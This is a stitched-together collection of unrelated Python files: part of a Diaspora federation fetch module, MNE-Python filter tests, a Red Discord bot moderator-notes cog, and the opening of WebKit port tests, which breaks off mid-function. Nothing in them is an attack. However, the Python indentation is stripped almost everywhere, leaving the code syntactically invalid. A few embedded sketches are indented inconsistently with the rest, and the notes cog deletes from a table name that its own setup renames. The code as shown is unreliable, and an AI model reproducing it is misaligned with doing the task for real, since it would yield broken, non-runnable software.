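# not a complete Diaspora hCard):
#
#   hcard = '''
#   <div><span class="fn">Alice Example</span>
#        <span class="uid">abcdef1234</span>
#        <pre class="key">-----BEGIN PUBLIC KEY-----...</pre></div>
#   '''
#   parse_profile_from_hcard(hcard, "alice@example.com")
#   # -> DiasporaProfile with name, guid and public_key populated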
def retrieve_and_parse_content(
id: str, guid: str, handle: str, entity_type: str, sender_key_fetcher: Callable[[str], str]=None,
):
"""Retrieve remote content and return an Entity class instance.
This is basically the inverse of receiving an entity. Instead, we fetch it, then call "handle_receive".
:param sender_key_fetcher: Function to use to fetch the sender's public key. If not given, the
network will be used to fetch the profile and the key. The function must take the handle as its
only parameter and return a public key.
:returns: Entity object instance or ``None``
"""
if not validate_handle(handle):
return
_username, domain = handle.split("@")
url = get_fetch_content_endpoint(domain, entity_type.lower(), guid)
document, status_code, error = fetch_document(url)
if status_code == 200:
request = RequestType(body=document)
_sender, _protocol, entities = handle_receive(request, sender_key_fetcher=sender_key_fetcher)
if len(entities) > 1:
logger.warning("retrieve_and_parse_content - more than one entity parsed from remote even though we"
"expected only one! ID %s", guid)
if entities:
return entities[0]
return
elif status_code == 404:
logger.warning("retrieve_and_parse_content - remote content %s not found", guid)
return
if error:
raise error
raise Exception("retrieve_and_parse_content - unknown problem when fetching document: %s, %s, %s" % (
document, status_code, error,
))
def retrieve_and_parse_profile(handle):
"""
Retrieve the remote user and return a Profile object.
:arg handle: User handle in username@domain.tld format
:returns: ``federation.entities.Profile`` instance or None
"""
hcard = retrieve_diaspora_hcard(handle)
if not hcard:
return None
profile = parse_profile_from_hcard(hcard, handle)
try:
profile.validate()
except ValueError as ex:
logger.warning("retrieve_and_parse_profile - found profile %s but it didn't validate: %s",
profile, ex)
return None
return profile
def get_fetch_content_endpoint(domain, entity_type, guid):
"""Get remote fetch content endpoint.
See: https://diaspora.github.io/diaspora_federation/federation/fetching.html
"""
return "https://%s/fetch/%s/%s" % (domain, entity_type, guid)
def get_public_endpoint(id: str) -> str:
"""Get remote endpoint for delivering public payloads."""
_username, domain = id.split("@")
return "https://%s/receive/public" % domain
def get_private_endpoint(id: str, guid: str) -> str:
"""Get remote endpoint for delivering private payloads."""
_username, domain = id.split("@")
return "https://%s/receive/users/%s" % (domain, guid)
|
|
import os.path as op
import warnings
import numpy as np
from numpy.testing import (assert_array_almost_equal, assert_almost_equal,
assert_array_equal, assert_allclose)
from nose.tools import assert_equal, assert_true, assert_raises
from scipy.signal import resample as sp_resample, butter
from mne import create_info
from mne.io import RawArray, read_raw_fif
from mne.filter import (band_pass_filter, high_pass_filter, low_pass_filter,
band_stop_filter, resample, _resample_stim_channels,
construct_iir_filter, notch_filter, detrend,
_overlap_add_filter, _smart_pad, design_mne_c_filter,
estimate_ringing_samples, filter_data)
from mne.utils import (sum_squared, run_tests_if_main, slow_test,
catch_logging, requires_version, _TempDir,
requires_mne, run_subprocess)
warnings.simplefilter('always') # enable b/c these tests throw warnings
rng = np.random.RandomState(0)
@requires_mne
def test_mne_c_design():
"""Test MNE-C filter design"""
tempdir = _TempDir()
temp_fname = op.join(tempdir, 'test_raw.fif')
out_fname = op.join(tempdir, 'test_c_raw.fif')
x = np.zeros((1, 10001))
x[0, 5000] = 1.
time_sl = slice(5000 - 4096, 5000 + 4097)
sfreq = 1000.
RawArray(x, create_info(1, sfreq, 'eeg')).save(temp_fname)
tols = dict(rtol=1e-4, atol=1e-4)
cmd = ('mne_process_raw', '--projoff', '--raw', temp_fname,
'--save', out_fname)
run_subprocess(cmd)
h = design_mne_c_filter(sfreq, None, 40)
h_c = read_raw_fif(out_fname)[0][0][0][time_sl]
assert_allclose(h, h_c, **tols)
run_subprocess(cmd + ('--highpass', '5', '--highpassw', '2.5'))
h = design_mne_c_filter(sfreq, 5, 40, 2.5)
h_c = read_raw_fif(out_fname)[0][0][0][time_sl]
assert_allclose(h, h_c, **tols)
run_subprocess(cmd + ('--lowpass', '1000', '--highpass', '10'))
h = design_mne_c_filter(sfreq, 10, None, verbose=True)
h_c = read_raw_fif(out_fname)[0][0][0][time_sl]
assert_allclose(h, h_c, **tols)
@requires_version('scipy', '0.16')
def test_estimate_ringing():
"""Test our ringing estimation function"""
# Actual values might differ based on system, so let's be approximate
for kind in ('ba', 'sos'):
for thresh, lims in ((0.1, (30, 60)), # 47
(0.01, (300, 600)), # 475
(0.001, (3000, 6000)), # 4758
(0.0001, (30000, 60000))): # 37993
n_ring = estimate_ringing_samples(butter(3, thresh, output=kind))
assert_true(lims[0] <= n_ring <= lims[1],
msg='%s %s: %s <= %s <= %s'
% (kind, thresh, lims[0], n_ring, lims[1]))
with warnings.catch_warnings(record=True) as w:
assert_equal(estimate_ringing_samples(butter(4, 0.00001)), 100000)
assert_true(any('properly estimate' in str(ww.message) for ww in w))
def test_1d_filter():
"""Test our private overlap-add filtering function"""
# make some random signals and filters
for n_signal in (1, 2, 3, 5, 10, 20, 40):
x = rng.randn(n_signal)
for n_filter in (1, 2, 3, 5, 10, 11, 20, 21, 40, 41, 100, 101):
for filter_type in ('identity', 'random'):
if filter_type == 'random':
h = rng.randn(n_filter)
else: # filter_type == 'identity'
h = np.concatenate([[1.], np.zeros(n_filter - 1)])
# ensure we pad the signal the same way for both filters
n_pad = n_filter - 1
x_pad = _smart_pad(x, np.array([n_pad, n_pad]))
for phase in ('zero', 'linear', 'zero-double'):
# compute our expected result the slow way
if phase == 'zero':
# only allow zero-phase for odd-length filters
if n_filter % 2 == 0:
assert_raises(RuntimeError, _overlap_add_filter,
x[np.newaxis], h, phase=phase)
continue
shift = (len(h) - 1) // 2
x_expected = np.convolve(x_pad, h)
x_expected = x_expected[shift:len(x_expected) - shift]
elif phase == 'zero-double':
shift = len(h) - 1
x_expected = np.convolve(x_pad, h)
x_expected = np.convolve(x_expected[::-1], h)[::-1]
x_expected = x_expected[shift:len(x_expected) - shift]
shift = 0
else:
shift = 0
x_expected = np.convolve(x_pad, h)
x_expected = x_expected[:len(x_expected) - len(h) + 1]
# remove padding
if n_pad > 0:
x_expected = x_expected[n_pad:len(x_expected) - n_pad]
assert_equal(len(x_expected), len(x))
# make sure we actually set things up reasonably
if filter_type == 'identity':
out = x_pad.copy()
out = out[shift + n_pad:]
out = out[:len(x)]
out = np.concatenate((out, np.zeros(max(len(x) -
len(out), 0))))
assert_equal(len(out), len(x))
assert_allclose(out, x_expected)
assert_equal(len(x_expected), len(x))
# compute our version
for n_fft in (None, 32, 128, 129, 1023, 1024, 1025, 2048):
# need to use .copy() b/c signal gets modified inplace
x_copy = x[np.newaxis, :].copy()
min_fft = 2 * n_filter - 1
if phase == 'zero-double':
min_fft = 2 * min_fft - 1
if n_fft is not None and n_fft < min_fft:
assert_raises(ValueError, _overlap_add_filter,
x_copy, h, n_fft, phase=phase)
else:
x_filtered = _overlap_add_filter(
x_copy, h, n_fft, phase=phase)[0]
assert_allclose(x_filtered, x_expected, atol=1e-13)
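# For reference, a minimal numpy-only sketch of the overlap-add technique the
# test above exercises (simplified conventions, not the MNE implementation;
# requires n_fft >= len(h)):
def _overlap_add_sketch(x, h, n_fft):
    """Causally filter 1D `x` with FIR kernel `h` via FFT overlap-add."""
    n_h = len(h)
    n_seg = n_fft - n_h + 1  # input samples consumed per FFT block
    h_fft = np.fft.rfft(h, n_fft)
    out = np.zeros(len(x) + n_h - 1)
    for start in range(0, len(x), n_seg):
        y = np.fft.irfft(np.fft.rfft(x[start:start + n_seg], n_fft) * h_fft,
                         n_fft)
        stop = min(start + n_fft, len(out))
        out[start:stop] += y[:stop - start]  # overlapping tails sum up
    # equivalent to np.convolve(x, h)[:len(x)] up to numerical error
    return out[:len(x)]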
@requires_version('scipy', '0.16')
def test_iir_stability():
"""Test IIR filter stability check"""
sig = np.empty(1000)
sfreq = 1000
# This will make an unstable filter, should throw RuntimeError
assert_raises(RuntimeError, high_pass_filter, sig, sfreq, 0.6,
method='iir', iir_params=dict(ftype='butter', order=8,
output='ba'))
# This one should work just fine
high_pass_filter(sig, sfreq, 0.6, method='iir',
iir_params=dict(ftype='butter', order=8, output='sos'))
# bad system type
assert_raises(ValueError, high_pass_filter, sig, sfreq, 0.6, method='iir',
iir_params=dict(ftype='butter', order=8, output='foo'))
# missing ftype
assert_raises(RuntimeError, high_pass_filter, sig, sfreq, 0.6,
method='iir', iir_params=dict(order=8, output='sos'))
# bad ftype
assert_raises(RuntimeError, high_pass_filter, sig, sfreq, 0.6,
method='iir',
iir_params=dict(order=8, ftype='foo', output='sos'))
# missing gstop
assert_raises(RuntimeError, high_pass_filter, sig, sfreq, 0.6,
method='iir', iir_params=dict(gpass=0.5, output='sos'))
# can't pass iir_params if method='fft'
assert_raises(ValueError, high_pass_filter, sig, sfreq, 0.1,
method='fft', iir_params=dict(ftype='butter', order=2,
output='sos'))
# method must be string
assert_raises(TypeError, high_pass_filter, sig, sfreq, 0.1,
method=1)
# unknown method
assert_raises(ValueError, high_pass_filter, sig, sfreq, 0.1,
method='blah')
# bad iir_params
assert_raises(TypeError, high_pass_filter, sig, sfreq, 0.1,
method='iir', iir_params='blah')
assert_raises(ValueError, high_pass_filter, sig, sfreq, 0.1,
method='fft', iir_params=dict())
# should pass because default trans_bandwidth is not relevant
iir_params = dict(ftype='butter', order=2, output='sos')
x_sos = high_pass_filter(sig, 250, 0.5, method='iir',
iir_params=iir_params)
iir_params_sos = construct_iir_filter(iir_params, f_pass=0.5, sfreq=250,
btype='highpass')
x_sos_2 = high_pass_filter(sig, 250, 0.5, method='iir',
iir_params=iir_params_sos)
assert_allclose(x_sos[100:-100], x_sos_2[100:-100])
x_ba = high_pass_filter(sig, 250, 0.5, method='iir',
iir_params=dict(ftype='butter', order=2,
output='ba'))
# Note that this will fail for higher orders (e.g., 6) showing the
# hopefully decreased numerical error of SOS
assert_allclose(x_sos[100:-100], x_ba[100:-100])
def test_notch_filters():
"""Test notch filters"""
# let's use an ugly, prime sfreq for fun
sfreq = 487.0
sig_len_secs = 20
t = np.arange(0, int(sig_len_secs * sfreq)) / sfreq
freqs = np.arange(60, 241, 60)
# make a "signal"
a = rng.randn(int(sig_len_secs * sfreq))
orig_power = np.sqrt(np.mean(a ** 2))
# make line noise
a += np.sum([np.sin(2 * np.pi * f * t) for f in freqs], axis=0)
# only allow None line_freqs with 'spectrum_fit' mode
assert_raises(ValueError, notch_filter, a, sfreq, None, 'fft')
assert_raises(ValueError, notch_filter, a, sfreq, None, 'iir')
methods = ['spectrum_fit', 'spectrum_fit', 'fft', 'fft', 'iir']
filter_lengths = [None, None, None, 8192, None]
line_freqs = [None, freqs, freqs, freqs, freqs]
tols = [2, 1, 1, 1, 1]
for meth, lf, fl, tol in zip(methods, line_freqs, filter_lengths, tols):
with catch_logging() as log_file:
with warnings.catch_warnings(record=True): # filter_length=None
b = notch_filter(a, sfreq, lf, filter_length=fl, method=meth,
phase='zero', verbose=True)
if lf is None:
out = log_file.getvalue().split('\n')[:-1]
if len(out) != 2 and len(out) != 3: # force_serial: len(out) == 3
raise ValueError('Detected frequencies not logged properly')
out = np.fromstring(out[-1], sep=', ')
assert_array_almost_equal(out, freqs)
new_power = np.sqrt(sum_squared(b) / b.size)
assert_almost_equal(new_power, orig_power, tol)
def test_resample():
"""Test resampling"""
x = rng.normal(0, 1, (10, 10, 10))
x_rs = resample(x, 1, 2, 10)
assert_equal(x.shape, (10, 10, 10))
assert_equal(x_rs.shape, (10, 10, 5))
x_2 = x.swapaxes(0, 1)
x_2_rs = resample(x_2, 1, 2, 10)
assert_array_equal(x_2_rs.swapaxes(0, 1), x_rs)
x_3 = x.swapaxes(0, 2)
x_3_rs = resample(x_3, 1, 2, 10, 0)
assert_array_equal(x_3_rs.swapaxes(0, 2), x_rs)
# make sure we cast to array if necessary
assert_array_equal(resample([0, 0], 2, 1), [0., 0., 0., 0.])
def test_resample_stim_channel():
"""Test resampling of stim channels"""
# Downsampling
assert_array_equal(
_resample_stim_channels([1, 0, 0, 0, 2, 0, 0, 0], 1, 2),
[[1, 0, 2, 0]])
assert_array_equal(
_resample_stim_channels([1, 0, 0, 0, 2, 0, 0, 0], 1, 1.5),
[[1, 0, 0, 2, 0]])
assert_array_equal(
_resample_stim_channels([1, 0, 0, 1, 2, 0, 0, 1], 1, 2),
[[1, 1, 2, 1]])
# Upsampling
assert_array_equal(
_resample_stim_channels([1, 2, 3], 2, 1), [[1, 1, 2, 2, 3, 3]])
assert_array_equal(
_resample_stim_channels([1, 2, 3], 2.5, 1), [[1, 1, 1, 2, 2, 3, 3, 3]])
# Proper number of samples in stim channel resampling from io/base.py
data_chunk = np.zeros((1, 315600))
for new_data_len in (52598, 52599, 52600, 52601, 315599, 315600):
new_data = _resample_stim_channels(data_chunk, new_data_len,
data_chunk.shape[1])
assert_equal(new_data.shape[1], new_data_len)
@requires_version('scipy', '0.16')
@slow_test
def test_filters():
"""Test low-, band-, high-pass, and band-stop filters plus resampling"""
sfreq = 100
sig_len_secs = 15
a = rng.randn(2, sig_len_secs * sfreq)
# let's test our catchers
for fl in ['blah', [0, 1], 1000.5, '10ss', '10']:
assert_raises(ValueError, band_pass_filter, a, sfreq, 4, 8, fl,
1.0, 1.0, phase='zero')
for nj in ['blah', 0.5]:
assert_raises(ValueError, band_pass_filter, a, sfreq, 4, 8, 100,
1.0, 1.0, n_jobs=nj, phase='zero', fir_window='hann')
assert_raises(ValueError, band_pass_filter, a, sfreq, 4, 8, 100,
1.0, 1.0, phase='zero', fir_window='foo')
# > Nyq/2
assert_raises(ValueError, band_pass_filter, a, sfreq, 4, sfreq / 2.,
100, 1.0, 1.0, phase='zero', fir_window='hann')
assert_raises(ValueError, low_pass_filter, a, sfreq, sfreq / 2.,
100, 1.0, phase='zero', fir_window='hann')
# check our short-filter warning:
with warnings.catch_warnings(record=True) as w:
# Warning for low attenuation
band_pass_filter(a, sfreq, 1, 8, filter_length=256, phase='zero')
assert_true(any('attenuation' in str(ww.message) for ww in w))
with warnings.catch_warnings(record=True) as w:
# Warning for too short a filter
band_pass_filter(a, sfreq, 1, 8, filter_length='0.5s', phase='zero')
assert_true(any('Increase filter_length' in str(ww.message) for ww in w))
# try new default and old default
for fl in ['auto', '10s', '5000ms', 1024]:
bp = band_pass_filter(a, sfreq, 4, 8, fl, 1.0, 1.0, phase='zero',
fir_window='hamming')
bs = band_stop_filter(a, sfreq, 4 - 1.0, 8 + 1.0, fl, 1.0, 1.0,
phase='zero', fir_window='hamming')
lp = low_pass_filter(a, sfreq, 8, fl, 1.0, n_jobs=2, phase='zero',
fir_window='hamming')
hp = high_pass_filter(lp, sfreq, 4, fl, 1.0, phase='zero',
fir_window='hamming')
assert_array_almost_equal(hp, bp, 4)
assert_array_almost_equal(bp + bs, a, 4)
# and since these are low-passed, downsampling/upsampling should be close
n_resamp_ignore = 10
bp_up_dn = resample(resample(bp, 2, 1, n_jobs=2), 1, 2, n_jobs=2)
assert_array_almost_equal(bp[n_resamp_ignore:-n_resamp_ignore],
bp_up_dn[n_resamp_ignore:-n_resamp_ignore], 2)
# note that on systems without CUDA, this line serves as a test for a
# graceful fallback to n_jobs=1
bp_up_dn = resample(resample(bp, 2, 1, n_jobs='cuda'), 1, 2, n_jobs='cuda')
assert_array_almost_equal(bp[n_resamp_ignore:-n_resamp_ignore],
bp_up_dn[n_resamp_ignore:-n_resamp_ignore], 2)
# test to make sure our resampling matches scipy's
bp_up_dn = sp_resample(sp_resample(bp, 2 * bp.shape[-1], axis=-1,
window='boxcar'),
bp.shape[-1], window='boxcar', axis=-1)
assert_array_almost_equal(bp[n_resamp_ignore:-n_resamp_ignore],
bp_up_dn[n_resamp_ignore:-n_resamp_ignore], 2)
# make sure we don't alias
t = np.array(list(range(sfreq * sig_len_secs))) / float(sfreq)
# make sinusoid close to the Nyquist frequency
sig = np.sin(2 * np.pi * sfreq / 2.2 * t)
# signal should disappear with 2x downsampling
sig_gone = resample(sig, 1, 2)[n_resamp_ignore:-n_resamp_ignore]
assert_array_almost_equal(np.zeros_like(sig_gone), sig_gone, 2)
# let's construct some filters
iir_params = dict(ftype='cheby1', gpass=1, gstop=20, output='ba')
iir_params = construct_iir_filter(iir_params, 40, 80, 1000, 'low')
# this should be a third order filter
assert_equal(iir_params['a'].size - 1, 3)
assert_equal(iir_params['b'].size - 1, 3)
iir_params = dict(ftype='butter', order=4, output='ba')
iir_params = construct_iir_filter(iir_params, 40, None, 1000, 'low')
assert_equal(iir_params['a'].size - 1, 4)
assert_equal(iir_params['b'].size - 1, 4)
iir_params = dict(ftype='cheby1', gpass=1, gstop=20, output='sos')
iir_params = construct_iir_filter(iir_params, 40, 80, 1000, 'low')
# this should be a third order filter, which requires 2 SOS ((2, 6))
assert_equal(iir_params['sos'].shape, (2, 6))
iir_params = dict(ftype='butter', order=4, output='sos')
iir_params = construct_iir_filter(iir_params, 40, None, 1000, 'low')
assert_equal(iir_params['sos'].shape, (2, 6))
# check that picks work for 3d array with one channel and picks=[0]
a = rng.randn(5 * sfreq, 5 * sfreq)
b = a[:, None, :]
a_filt = band_pass_filter(a, sfreq, 4, 8, 400, 2.0, 2.0, phase='zero',
fir_window='hamming')
b_filt = band_pass_filter(b, sfreq, 4, 8, 400, 2.0, 2.0, picks=[0],
phase='zero', fir_window='hamming')
assert_array_equal(a_filt[:, None, :], b_filt)
# check for n-dimensional case
a = rng.randn(2, 2, 2, 2)
with warnings.catch_warnings(record=True): # filter too long
assert_raises(ValueError, band_pass_filter, a, sfreq, 4, 8, 100,
1.0, 1.0, picks=np.array([0, 1]), phase='zero')
def test_filter_auto():
"""Test filter auto parameters"""
# test that our overlap-add filtering doesn't introduce strange
# artifacts (from mne_analyze mailing list 2015/06/25)
N = 300
sfreq = 100.
lp = 10.
sine_freq = 1.
x = np.ones(N)
t = np.arange(N) / sfreq
x += np.sin(2 * np.pi * sine_freq * t)
x_filt = low_pass_filter(x, sfreq, lp, 'auto', 'auto', phase='zero',
fir_window='hamming')
# the firwin2 function gets us this close
assert_allclose(x, x_filt, rtol=1e-4, atol=1e-4)
# degenerate conditions
assert_raises(ValueError, filter_data, x, sfreq, 1, 10) # not 2D
assert_raises(ValueError, filter_data, x[np.newaxis], -sfreq, 1, 10)
assert_raises(ValueError, filter_data, x[np.newaxis], sfreq, 1,
sfreq * 0.75)
def test_cuda():
"""Test CUDA-based filtering"""
# NOTE: don't make test_cuda() the last test, or pycuda might spew
# some warnings about clean-up failing
# Also, using `n_jobs='cuda'` on a non-CUDA system should be fine,
# as it should fall back to using n_jobs=1.
sfreq = 500
sig_len_secs = 20
a = rng.randn(sig_len_secs * sfreq)
with catch_logging() as log_file:
for fl in ['auto', '10s', 2048]:
bp = band_pass_filter(a, sfreq, 4, 8, fl, 1.0, 1.0, n_jobs=1,
phase='zero', fir_window='hann')
bs = band_stop_filter(a, sfreq, 4 - 1.0, 8 + 1.0, fl, 1.0, 1.0,
n_jobs=1, phase='zero', fir_window='hann')
lp = low_pass_filter(a, sfreq, 8, fl, 1.0, n_jobs=1, phase='zero',
fir_window='hann')
hp = high_pass_filter(lp, sfreq, 4, fl, 1.0, n_jobs=1,
phase='zero', fir_window='hann')
bp_c = band_pass_filter(a, sfreq, 4, 8, fl, 1.0, 1.0,
n_jobs='cuda', verbose='INFO',
phase='zero', fir_window='hann')
bs_c = band_stop_filter(a, sfreq, 4 - 1.0, 8 + 1.0, fl, 1.0, 1.0,
n_jobs='cuda', verbose='INFO',
phase='zero', fir_window='hann')
lp_c = low_pass_filter(a, sfreq, 8, fl, 1.0,
n_jobs='cuda', verbose='INFO',
phase='zero', fir_window='hann')
hp_c = high_pass_filter(lp, sfreq, 4, fl, 1.0,
n_jobs='cuda', verbose='INFO',
phase='zero', fir_window='hann')
assert_array_almost_equal(bp, bp_c, 12)
assert_array_almost_equal(bs, bs_c, 12)
assert_array_almost_equal(lp, lp_c, 12)
assert_array_almost_equal(hp, hp_c, 12)
# check to make sure we actually used CUDA
out = log_file.getvalue().split('\n')[:-1]
# triage based on whether or not we actually expected to use CUDA
from mne.cuda import _cuda_capable # allow above funs to set it
tot = 12 if _cuda_capable else 0
assert_true(sum(['Using CUDA for FFT FIR filtering' in o
for o in out]) == tot)
# check resampling
for window in ('boxcar', 'triang'):
for N in (997, 1000): # one prime, one even
a = rng.randn(2, N)
for fro, to in ((1, 2), (2, 1), (1, 3), (3, 1)):
a1 = resample(a, fro, to, n_jobs=1, npad='auto',
window=window)
a2 = resample(a, fro, to, n_jobs='cuda', npad='auto',
window=window)
assert_allclose(a1, a2, rtol=1e-7, atol=1e-14)
assert_array_almost_equal(a1, a2, 14)
assert_array_equal(resample([0, 0], 2, 1, n_jobs='cuda'), [0., 0., 0., 0.])
assert_array_equal(resample(np.zeros(2, np.float32), 2, 1, n_jobs='cuda'),
[0., 0., 0., 0.])
def test_detrend():
"""Test zeroth and first order detrending"""
x = np.arange(10)
assert_array_almost_equal(detrend(x, 1), np.zeros_like(x))
x = np.ones(10)
assert_array_almost_equal(detrend(x, 0), np.zeros_like(x))
run_tests_if_main()
|
|
from __future__ import annotations
import asyncio
import logging
from datetime import datetime
from typing import Iterator, Literal, NamedTuple, Optional
import discord
from redbot.core import checks, commands
from redbot.core.bot import Red
from redbot.core.data_manager import cog_data_path
from redbot.core.utils import menus
from .apsw_wrapper import Connection
from .converters import MemberOrID
log = logging.getLogger("red.sinbadcogs.modnotes")
class Note(NamedTuple):
uid: int
author_id: int
subject_id: int
guild_id: int
note: str
created_at: int
def embed(self, ctx, color) -> discord.Embed:
e = discord.Embed(
description=self.note,
timestamp=datetime.fromtimestamp(self.created_at),
color=color,
)
author = ctx.guild.get_member(self.author_id)
subject = ctx.guild.get_member(self.subject_id)
a_str = (
f"{author} ({self.author_id})"
if author
else f"Unknown Author ({self.author_id})"
)
s_str = (
f"{subject} ({self.subject_id})"
if subject
else f"Unknown Subject ({self.subject_id})"
)
e.add_field(name="Note Author", value=a_str)
e.add_field(name="Note Subject", value=s_str)
return e
class ModNotes(commands.Cog):
"""
Store moderation notes
"""
__version__ = "340.0.0"
async def red_delete_data_for_user(
self,
*,
requester: Literal["discord_deleted_user", "owner", "user", "user_strict"],
user_id: int,
):
if requester != "discord_deleted_user":
return
await self.bot.send_to_owners(
f"Data deletion request for `ModNotes` by {requester} for user id {user_id}."
)
def format_help_for_context(self, ctx):
pre_processed = super().format_help_for_context(ctx)
return f"{pre_processed}\nCog Version: {self.__version__}"
def __init__(self, bot: Red):
self.bot: Red = bot
fp = str(cog_data_path(self) / "notes.db")
self._connection = Connection(fp)
self._ready_event = asyncio.Event()
self._init_task: Optional[asyncio.Task] = None
def init(self):
self._init_task = asyncio.create_task(self.initialize())
def done_callback(fut: asyncio.Future):
try:
fut.exception()
except asyncio.CancelledError:
log.info("Modnotes didn't set up and was cancelled")
except asyncio.InvalidStateError as exc:
log.exception(
"We somehow have a done callback when not done?", exc_info=exc
)
except Exception as exc:
log.exception("Unexpected exception in modnotes: ", exc_info=exc)
self._init_task.add_done_callback(done_callback)
async def initialize(self):
await self.bot.wait_until_ready()
with self._connection.with_cursor() as cursor:
cursor.execute("""PRAGMA journal_mode=wal""")
# rename if exists NOTES -> member_notes
cursor.execute("""PRAGMA table_info("NOTES")""")
if cursor.fetchone():
cursor.execute("""ALTER TABLE NOTES RENAME TO member_notes""")
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS member_notes (
uid INTEGER PRIMARY KEY AUTOINCREMENT,
author_id INTEGER NOT NULL,
subject_id INTEGER NOT NULL,
guild_id INTEGER NOT NULL,
note TEXT,
created INTEGER NOT NULL
)
"""
)
# If lookups feel slow,
# Consider an index later on member_notes(subject_id, guild_id)
self._ready_event.set()
async def cog_before_invoke(self, ctx):
await self._ready_event.wait()
def cog_unload(self):
if self._init_task:
self._init_task.cancel()
def insert(self, *, author_id: int, subject_id: int, guild_id: int, note: str):
with self._connection.with_cursor() as cursor:
now = int(datetime.utcnow().timestamp())
cursor.execute(
"""
INSERT INTO member_notes(author_id, subject_id, guild_id, note, created)
VALUES(?,?,?,?,?)
""",
(author_id, subject_id, guild_id, note, now),
)
def find_by_author(self, author_id: int) -> Iterator[Note]:
with self._connection.with_cursor() as cursor:
for items in cursor.execute(
"""
SELECT uid, author_id, subject_id, guild_id, note, created
FROM member_notes
WHERE author_id=?
ORDER BY created
""",
(author_id,),
):
yield Note(*items)
def find_by_author_in_guild(
self, *, author_id: int, guild_id: int
) -> Iterator[Note]:
with self._connection.with_cursor() as cursor:
for items in cursor.execute(
"""
SELECT uid, author_id, subject_id, guild_id, note, created
FROM member_notes
WHERE author_id=? AND guild_id=?
ORDER BY created
""",
(author_id, guild_id),
):
yield Note(*items)
def find_by_member(self, *, member_id: int, guild_id: int) -> Iterator[Note]:
with self._connection.with_cursor() as cursor:
for items in cursor.execute(
"""
SELECT uid, author_id, subject_id, guild_id, note, created
FROM member_notes
WHERE subject_id=? AND guild_id=?
ORDER BY created
""",
(member_id, guild_id),
):
yield Note(*items)
def find_by_guild(self, guild_id: int) -> Iterator[Note]:
with self._connection.with_cursor() as cursor:
for items in cursor.execute(
"""
SELECT uid, author_id, subject_id, guild_id, note, created
FROM member_notes
WHERE guild_id=?
ORDER BY created
""",
(guild_id,),
):
yield Note(*items)
def delete_by_uid(self, uid: int):
with self._connection.with_cursor() as cursor:
cursor.execute("DELETE FROM NOTES WHERE uid=?", (uid,))
@checks.mod()
@commands.guild_only()
@commands.command()
async def makemodnote(self, ctx, user: MemberOrID, *, note: str):
""" Make a note about a user """
self.insert(
author_id=ctx.author.id,
subject_id=user.id,
note=note,
guild_id=ctx.guild.id,
)
await ctx.tick()
@checks.mod()
@commands.guild_only()
@commands.group()
async def getmodnotes(self, ctx):
""" Get notes """
pass
@getmodnotes.command()
async def about(self, ctx, user: MemberOrID):
""" Get notes about a user """
color = await ctx.embed_color()
notes = [
n.embed(ctx, color)
for n in self.find_by_member(member_id=user.id, guild_id=ctx.guild.id)
]
if not notes:
return await ctx.send("No mod notes about this user")
mx = len(notes)
for i, n in enumerate(notes, 1):
n.title = f"Showing #{i} of {mx} found notes"
await menus.menu(ctx, notes, menus.DEFAULT_CONTROLS)
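# A minimal usage sketch of the storage helpers (ids are illustrative and
# `cog` stands for a constructed ModNotes instance):
#
#   cog.insert(author_id=1, subject_id=2, guild_id=3, note="Spamming")
#   notes = list(cog.find_by_member(member_id=2, guild_id=3))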
|
|
# Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import logging
import optparse
import sys
import tempfile
import unittest2 as unittest
from webkitpy.common.system.executive import Executive, ScriptError
from webkitpy.common.system import executive_mock
from webkitpy.common.system.filesystem_mock import MockFileSystem
from webkitpy.common.system.outputcapture import OutputCapture
from webkitpy.common.system.path import abspath_to_uri
from webkitpy.thirdparty.mock import Mock
from webkitpy.tool.mocktool import MockOptions
from webkitpy.common.system.executive_mock import MockExecutive, MockExecutive2
from webkitpy.common.system.systemhost_mock import MockSystemHost
from webkitpy.port import Port, Driver, DriverOutput
from webkitpy.port.test import add_unit_tests_to_mock_filesystem, TestPort
class PortTest(unittest.TestCase):
def make_port(self, executive=None, with_tests=False, port_name=None, **kwargs):
host = MockSystemHost()
if executive:
host.executive = executive
if with_tests:
add_unit_tests_to_mock_filesystem(host.filesystem)
return TestPort(host, **kwargs)
return Port(host, port_name or 'baseport', **kwargs)
def test_default_child_processes(self):
port = self.make_port()
self.assertIsNotNone(port.default_child_processes())
def test_format_wdiff_output_as_html(self):
output = "OUTPUT %s %s %s" % (Port._WDIFF_DEL, Port._WDIFF_ADD, Port._WDIFF_END)
html = self.make_port()._format_wdiff_output_as_html(output)
expected_html = "<head><style>.del { background: #faa; } .add { background: #afa; }</style></head><pre>OUTPUT <span class=del> <span class=add> </span></pre>"
self.assertEqual(html, expected_html)
def test_wdiff_command(self):
port = self.make_port()
port._path_to_wdiff = lambda: "/path/to/wdiff"
command = port._wdiff_command("/actual/path", "/expected/path")
expected_command = [
"/path/to/wdiff",
"--start-delete=##WDIFF_DEL##",
"--end-delete=##WDIFF_END##",
"--start-insert=##WDIFF_ADD##",
"--end-insert=##WDIFF_END##",
"/actual/path",
"/expected/path",
]
self.assertEqual(command, expected_command)
def _file_with_contents(self, contents, encoding="utf-8"):
new_file = tempfile.NamedTemporaryFile()
